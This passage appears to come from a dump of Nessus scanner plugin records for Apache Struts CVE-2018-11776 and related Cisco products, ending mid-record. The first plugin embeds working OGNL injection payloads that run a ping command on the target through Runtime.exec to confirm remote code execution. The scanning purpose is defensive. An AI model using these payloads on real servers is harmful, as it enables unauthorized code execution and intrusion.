Struts running on the remote host is affected by a remote code execution vulnerability in the handling of results with no namespace set. An unauthenticated, remote attacker can exploit this, via a specially crafted HTTP request, to potentially execute arbitrary code, subject to the privileges of the web server user.", "cvss3": {}, "published": "2018-08-23T00:00:00", "type": "nessus", "title": "Apache Struts CVE-2018-11776 Results With No Namespace Remote Code Execution (S2-057) (remote)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2023-07-17T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_17_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/112064", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(112064);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/07/17\");\n\n script_cve_id(\"CVE-2018-11776\");\n script_bugtraq_id(105125);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Apache Struts CVE-2018-11776 Results With No Namespace Remote Code Execution (S2-057) (remote)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is affected by\na remote code execution vulnerability in the handling of results with\nno namespace set. An unauthenticated, remote attacker can exploit this,\nvia a specially crafted HTTP request, to potentially execute arbitrary\ncode, subject to the privileges of the web server user.\");\n # https://www.tenable.com/blog/new-apache-struts-vulnerability-could-allow-for-remote-code-execution\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a21304a0\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-057\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2018/Aug/46\");\n script_set_attribute(attribute:\"see_also\", value:\"https://semmle.com/news/apache-struts-CVE-2018-11776\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lgtm.com/blog/apache_struts_CVE-2018-11776\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.35 / 2.5.17 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list();\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach var cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match4 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match4))\n {\n urls = make_list(urls, match4[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\n\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\n# Always check web root\nurls = make_list(urls, \"/\");\n\n# Struts is slow\ntimeout = get_read_timeout() * 2;\nif(timeout < 10)\n timeout = 10;\nhttp_set_read_timeout(timeout);\n\nurls = list_uniq(urls);\nscanner_ip = compat::this_host();\ntarget_ip = get_host_ip();\nvuln = FALSE;\n\nua = get_kb_item(\"global_settings/http_user_agent\");\nif (empty_or_null(ua))\n ua = 'Nessus';\n\npat = hexstr(rand_str(length:10));\n\nos = get_kb_item(\"Host/OS\");\nif (!empty_or_null(os) && \"windows\" >< tolower(os))\n{\n ping_cmd = \"ping%20-n%203%20-l%20500%20\" + scanner_ip;\n filter = \"icmp and icmp[0] = 8 and src host \" + target_ip + \" and greater 500\";\n}\nelse\n{\n ping_cmd = \"ping%20-c%203%20-p%20\" + pat + \"%20\" + scanner_ip;\n filter = \"icmp and icmp[0] = 8 and src host \" + target_ip;\n}\n\npayload_redirect = \"%24%7B%7B57550614+16044095%7D%7D/\";\npayload_redirect_verify_regex = \"Location: .*\\[73594709\\]\";\n\npayload_2_2 = \"%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27\" + ping_cmd + \"%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/\";\n\npayload_2_3 = \"%24%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23cmd%3D%40java.lang.Runtime%40getRuntime%28%29.exec%28%27\" + ping_cmd + \"%27%29%29%7D/\";\n\nfunction namespace_inject(url, payload)\n{\n local_var bits, last, attack_url;\n\n # find the last / and put it after\n bits = split(url, sep:\"/\", keep:TRUE);\n last = max_index(bits) - 1;\n for (var i=0;i<last;i++)\n attack_url = attack_url + bits[i];\n attack_url = attack_url + payload;\n attack_url = attack_url + bits[last];\n\n return attack_url;\n}\n\nforeach var url (urls)\n{\n # first we try the 2.3.x payload\n soc = open_sock_tcp(port);\n if (!soc) audit(AUDIT_SOCK_FAIL, port);\n\n attack_url = namespace_inject(url:url, payload:payload_2_3);\n\n req =\n 'GET ' + attack_url + ' HTTP/1.1\\n' +\n 'Host: ' + target_ip + ':' + port + '\\n' +\n 'User-Agent: ' + ua + '\\n' +\n '\\n';\n\n s = send_capture(socket:soc,data:req,pcap_filter:filter,timeout:timeout);\n icmp = tolower(hexstr(get_icmp_element(icmp:s,element:\"data\")));\n close(soc);\n\n var snip = crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30);\n\n if (\"windows\" >< tolower(os) && !isnull(icmp))\n {\n vuln = TRUE;\n vuln_url = req;\n report =\n '\\nNessus confirmed this issue by examining ICMP traffic. '+\n 'Below is the response :' +\n '\\n\\n' + snip +\n '\\n' + icmp +\n '\\n' + snip +\n '\\n';\n break;\n }\n else if (pat >< icmp)\n {\n vuln = TRUE;\n vuln_url = req;\n report =\n '\\nNessus confirmed this issue by examining ICMP traffic and looking for'+\n '\\nthe pattern sent in our packet (' + pat + '). Below is the response :'+\n '\\n\\n' + snip +\n '\\n' + icmp +\n '\\n' + snip +\n '\\n';\n break;\n }\n\n # next we try the 2.2.x payload\n soc = open_sock_tcp(port);\n if (!soc) audit(AUDIT_SOCK_FAIL, port);\n\n attack_url = namespace_inject(url:url, payload:payload_2_2);\n\n req =\n 'GET ' + attack_url + ' HTTP/1.1\\n' +\n 'Host: ' + target_ip + ':' + port + '\\n' +\n 'User-Agent: ' + ua + '\\n' +\n '\\n';\n\n s = send_capture(socket:soc,data:req,pcap_filter:filter,timeout:timeout);\n icmp = tolower(hexstr(get_icmp_element(icmp:s,element:\"data\")));\n close(soc);\n\n if (\"windows\" >< tolower(os) && !isnull(icmp))\n {\n vuln = TRUE;\n vuln_url = req;\n report =\n '\\nNessus confirmed this issue by examining ICMP traffic. '+\n 'Below is the response :' +\n '\\n\\n' + snip +\n '\\n' + icmp +\n '\\n' + snip +\n '\\n';\n break;\n }\n else if (pat >< icmp)\n {\n vuln = TRUE;\n vuln_url = req;\n report =\n '\\nNessus confirmed this issue by examining ICMP traffic and looking for'+\n '\\nthe pattern sent in our packet (' + pat + '). Below is the response :'+\n '\\n\\n' + snip +\n '\\n' + icmp +\n '\\n' + snip +\n '\\n';\n break;\n }\n\n # and finally, we try a simple redirect namespace injection\n attack_url = namespace_inject(url:url, payload:payload_redirect);\n\n res = http_send_recv3(\n method : \"GET\",\n item : attack_url,\n port : port,\n exit_on_fail : TRUE,\n follow_redirect: 0\n );\n\n if (res[1] =~ payload_redirect_verify_regex)\n {\n vuln = TRUE;\n vuln_url = attack_url;\n report =\n '\\nNessus confirmed this issue by injecting a simple OGNL addition payload'+\n '\\n( ${{57550614+16044095}} ) into a redirect action namespace. Below is' +\n '\\nthe response :'+\n '\\n\\n' + snip +\n '\\n' + res[1] +\n '\\n' + snip +\n '\\n';\n break;\n }\n\n # Stop after first vulnerable Struts app is found\n if (vuln) break;\n}\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(vuln_url),\n output : report\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:40:33", "description": "According to its self-reported version, the Cisco Unified Communications Manager (CUCM) running on the remote device is affected by a remote code execution vulnerability. Please see the included Cisco BID and the Cisco Security Advisory for more information.", "cvss3": {}, "published": "2018-09-05T00:00:00", "type": "nessus", "title": "Cisco Unified Communication Manager Apache Struts RCE (CSCvm14042)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:cisco:unified_communications_manager"], "id": "CISCO-SA-20180823-APACHE-STRUTS-UCM.NASL", "href": "https://www.tenable.com/plugins/nessus/112289", "sourceData": "#TRUSTED 5538e58acd3b9c3603d69886501b4d03206d911e89a8d42c5b4e7eca707c4d625bc7498ef348a9ccbcb5336c36a12a8c522e9b7208a928417ca393d93d9b75b3674b5020a3adf4e9ded633106ddd86864d79657cbdb95644342b2f275592d8f9e6fc1f66ff78f01c1325c212b34be69ad9e19e9079abea97ba850b3de2a5b4c17ea6bcb025e35351d747f7a3bfd9a692abe32cfb1acd6df9a1ed4437cef173f52741ba940ea420a6a307c28113c77d3911f694bbd8b4770b2e393e952b7721160a3ace2b9a105b946878666ddb6b6277e8dd37cc0b540d3cab9ba05675333685d3567dc787a898345d49807afa2c4e8dadc80157671c59645ec28d4d731254f700afcdde8541b7fc40f5bf22104a815dfb9ffec8005793c65a930bc671999876981b110d057967ac4aec3e59486c42d91bfdbacd15266c2227ee145c9c1f68b594923b7c279533429a89c5a243111afa033972ae83c9fc79e2601de851679ed9c299cb484ffd80c57ac3b34925bb3cba116fcda0316d36ecd2faa6315da0eb4e36614b14339a5b4a8bf1733e633b7f9f29f76f24eb6dbba11d66280d6e3e0195481f24ff5256f30dbac9ca2fbd0297cc6cc377e602403cf222d850e159cf5a4a46f673c55f9ece04e1b4703056a271d88239f32fd0101e729543bc9b902ffe81653218ce1f59a8de7edc84c8cd3a6afeafbbf24ba8b4385bcd815cde5a4733f9\n#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(112289);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2018-11776\");\n script_bugtraq_id(105125);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvm14042\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20180823-apache-struts\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Cisco Unified Communication Manager Apache Struts RCE (CSCvm14042)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by an information disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the Cisco Unified\nCommunications Manager (CUCM) running on the remote device is affected\nby a remote code execution vulnerability. Please see the included\nCisco BID and the Cisco Security Advisory for more information.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180823-apache-struts\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56a0e547\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvm14042\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID\nCSCvm14042.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_communications_manager\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ucm_detect.nbin\");\n script_require_keys(\"Host/Cisco/CUCM/Version\", \"Host/Cisco/CUCM/Version_Display\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_workarounds.inc\");\ninclude(\"ccf.inc\");\n\nproduct_info = cisco::get_product_info(name:\"Cisco Unified Communications Manager\");\n\nversion_list = make_list(\n '11.0.1.10000.10',\n '11.5.1.10000.6',\n '12.0.1.10000.10',\n '12.5.0.98000.981');\n\nworkarounds = make_list(CISCO_WORKAROUNDS['no_workaround']);\nworkaround_params = make_list();\n\nreporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_HOLE,\n 'version' , product_info['display_version'],\n 'bug_id' , \"CSCvm14042\");\n\ncisco::check_and_report(product_info:product_info, workarounds:workarounds, workaround_params:workaround_params, reporting:reporting, vuln_versions:version_list);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:40:17", "description": "According to its self-reported version, the Cisco Unified Communications Manager IM & Presence Service is affected by a Remote Code Execution vulnerability. Please see the included Cisco BIDs and the Cisco Security Advisory for more information.", "cvss3": {}, "published": "2018-09-05T00:00:00", "type": "nessus", "title": "Cisco Unified Communications Manager IM & Presence Service Apache Struts RCE (CSCvm14049)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/a:cisco:unified_communications_manager_im_and_presence_service", "cpe:/a:cisco:unified_communications_manager", "cpe:/a:cisco:unified_presence_server"], "id": "CISCO-SA-20180823-APACHE-STRUTS-CUPS.NASL", "href": "https://www.tenable.com/plugins/nessus/112288", "sourceData": "#TRUSTED 531d8e919a578f5c402d55046279c6aa0319d64b11e6cfd1d400748c61e7c7ccaa711a8f2191f3390f64108dffec9cda1cfe6622e5965ce8740b74f709d83c9d97499c02c97b3848ad634219e609ff7acf98126943660349b42695aa34d768104c488c436c13e7667ce892766c7d106e37048ddcfba1ac2b772443e7a905b1e8a682e45817ad69bc684a2bce250dff79993839689a846ddc0e06ab184bbfc3958301fba47c2702e4bcc930e1eb90226c73a1a769e5c70c5b10a8341dac93b861d607f4713d05ce8f97544352f71f3a88dc9c2786a8e8747ac50f485c2b647276a41f88bb7c7cd340c7e3af67cd61a049cca011e3d9942ca32f0319c5fec33e651fb67d3d5f6f7859ea8414f333e21cac76fa1b4d3547ce78f376a0411eb50ef2dcbc163acce202bce2ef787f11028a173ada909c2b9bd82caddf4bb845e8159b4e4fb812ad4e8e6e24fad03496b0ac669c65e83433510c8b2b7915fa57f2f1f21d5866de373bf1fa4ecf5d5a50820a8f105b1744bd5693eda065b42bbb5486f28a0d2a94e6aa24fb12daafc9bf238b9c0add4691b0cbe3fe731b48a92d99ad9d4ffa22d31da79c776337c955cf2d58045aecf66c7250e7e147e1c6c36943213d6eea7c6c09437c8ec741e07e289ae48a2ec13c44a4b8ccf0d1b9824180479f8e787bdd465aa0346c61b3dcb6fe34ee45d7327e52b9c09a0dc5a05e7f4ed13b56\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(112288);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2018-11776\");\n script_bugtraq_id(105125);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvm14049\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20180823-apache-struts\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Cisco Unified Communications Manager IM & Presence Service Apache Struts RCE (CSCvm14049)\");\n script_summary(english:\"Checks the Cisco Unified Communications Manager version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the Cisco Unified\nCommunications Manager IM & Presence Service is affected by a Remote\nCode Execution vulnerability. Please see the included Cisco BIDs and\nthe Cisco Security Advisory for more information.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180823-apache-struts\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56a0e547\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvm14049\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID\nCSCvm14049.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_communications_manager_im_and_presence_service\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_communications_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_presence_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/UCOS/Cisco Unified Presence/version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_workarounds.inc\");\ninclude(\"ccf.inc\");\n\nproduct_info = cisco::get_product_info(name:\"Cisco Unified Presence\");\n\nversion_list = make_list('11.0.1', '11.5.1', '12.0.1');\n\nworkarounds = make_list(CISCO_WORKAROUNDS['no_workaround']);\nworkaround_params = make_list();\n\nreporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_HOLE,\n 'version' , product_info['version'],\n 'bug_id' , \"CSCvm14049\");\n\ncisco::check_and_report(product_info:product_info, workarounds:workarounds, workaround_params:workaround_params, reporting:reporting, vuln_versions:version_list);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:39:50", "description": "According to its self-reported version, the Cisco Identity Services Engine Software is affected by a struts2 namespace vulnerability.\nPlease see the included Cisco BID and the Cisco Security Advisory for more information.", "cvss3": {}, "published": "2018-08-31T00:00:00", "type": "nessus", "title": "Cisco Identity Services Engine Struts2 Namespace Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/h:cisco:identity_services_engine", "cpe:/a:cisco:identity_services_engine", "cpe:/a:cisco:identity_services_engine_software"], "id": "CISCO-SA-20180823-APACHE-STRUTS-ISE.NASL", "href": "https://www.tenable.com/plugins/nessus/112219", "sourceData": "#TRUSTED 97aa159b84dc044b30c1959493ad4c2ef0b54f85d3e848f88bee9278a7ddad8a181a74909f1d0d76ce1b6789d6c52e06d8149ee1cd6b40ddc4809e01f93833be8020dacc4dd4a97c9adce91fde281659f57715154563c57a7067c369b7d014b2a20c63c0692370955493497ee5cc676ed67b7252f230321c84a756e4f7c6d300d603cb3a8441874a6b4a31d3e38b204cdfedfac2e159a1a6050a4e54e7e7d3a571f78bedb4ce38b25be27cfd186ec5a6d7ecb38bfcfc47307d6e8f2129c339cc2a40a9c1c376b220a07abb868589c8dd6bda1077121b2eaf32b235e36d05a0421ed24805286671b039794ad9999fff2a8ceea76e4cc2f7cf8611fd9b28ec473949aba55b3f4a0cfd91455716d0733c829031593c83528f5d8fbcb05351beaad63c70c1095d11b5d38e04cba7fd3800c21beb5e6382e20a3ccb6d00ac98d43d6ea3f1ff6566edeb9f0e8d98068cf9d6c881c0642ffda92b77e30b7b7ddf74136dca18b0813568c2f591018a81531bae509d7df421eef82e4d4fba2ffd1b76b3a561e1018e2630dac16d14f05b6342fb8c08ca13b94882eb818ba59f9f11fce385b9a3bf4dd7f0524b9d50096716733342ac10b83b1e52ba609ba841786810a1c88816deeb90ef81ff652cb02d46c1babdec6c8b9d00657c051ee857779d7fd75b624224079533e69b4308b4ee87d8a1cc79d022715df20de81e55f351e7a543e7\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(112219);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2018-11776\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvm14030\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20180823-apache-struts\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Cisco Identity Services Engine Struts2 Namespace Vulnerability\");\n script_summary(english:\"Checks the Cisco Identity Services Engine Software version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the Cisco Identity Services\nEngine Software is affected by a struts2 namespace vulnerability.\nPlease see the included Cisco BID and the Cisco Security Advisory for\nmore information.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180823-apache-struts\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56a0e547\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvm14030\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID\nCSCvm14030.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:identity_services_engine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:identity_services_engine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:identity_services_engine_software\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ise_detect.nbin\");\n script_require_keys(\"Host/Cisco/ISE/version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_workarounds.inc\");\ninclude(\"ccf.inc\");\n\nproduct_info = cisco::get_product_info(name:\"Cisco Identity Services Engine Software\");\n\nvuln_ranges = [\n { 'min_ver' : '2.0.0.0', 'fix_ver' : '2.0.0.306' },\n { 'min_ver' : '2.0.1.0', 'fix_ver' : '2.0.1.130' },\n { 'min_ver' : '2.1.0.0', 'fix_ver' : '2.1.0.474' },\n { 'min_ver' : '2.2.0.0', 'fix_ver' : '2.2.0.470' },\n { 'min_ver' 